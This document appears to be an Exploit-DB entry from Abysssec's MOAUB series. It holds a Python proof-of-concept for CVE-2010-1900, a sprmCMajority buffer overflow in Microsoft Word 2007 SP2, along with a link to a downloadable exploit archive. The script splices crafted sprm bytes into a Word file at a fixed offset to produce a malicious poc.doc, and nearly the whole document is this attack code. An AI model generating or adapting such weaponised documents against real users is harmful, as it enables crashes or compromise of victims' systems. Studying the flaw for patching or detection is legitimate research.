1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
''' ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/ http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14971.zip (moaub-11-exploit.zip) ''' ''' Title :Microsoft Office Word sprmCMajority buffer overflow Version :Word 2007 SP 2 Analysis :http://www.abysssec.com Vendor:http://www.microsoft.com Impact:Critical Contact :shahin [at] abysssec.com , info[at] abysssec.com Twitter :@abysssec CVE :CVE-2010-1900 ''' import sys def main(): try: fdR = open('src.doc', 'rb+') strTotal = fdR.read() str1 = strTotal[:4082] str2 = strTotal[4088:] sprmCMajority = "\x47\xCA\xFF"# sprmCMajority sprmPAnld80 = "\x3E\xC6\xFF"# sprmPAnld80 fdW= open('poc.doc', 'wb+') fdW.write(str1) fdW.write(sprmCMajority) fdW.write(sprmPAnld80) fdW.write(str2) fdW.close() fdR.close() print '[-] Word file generated' except IOError: print '[*] Error : An IO error has occurred' print '[-] Exiting ...' sys.exit(-1) if __name__ == '__main__': main() |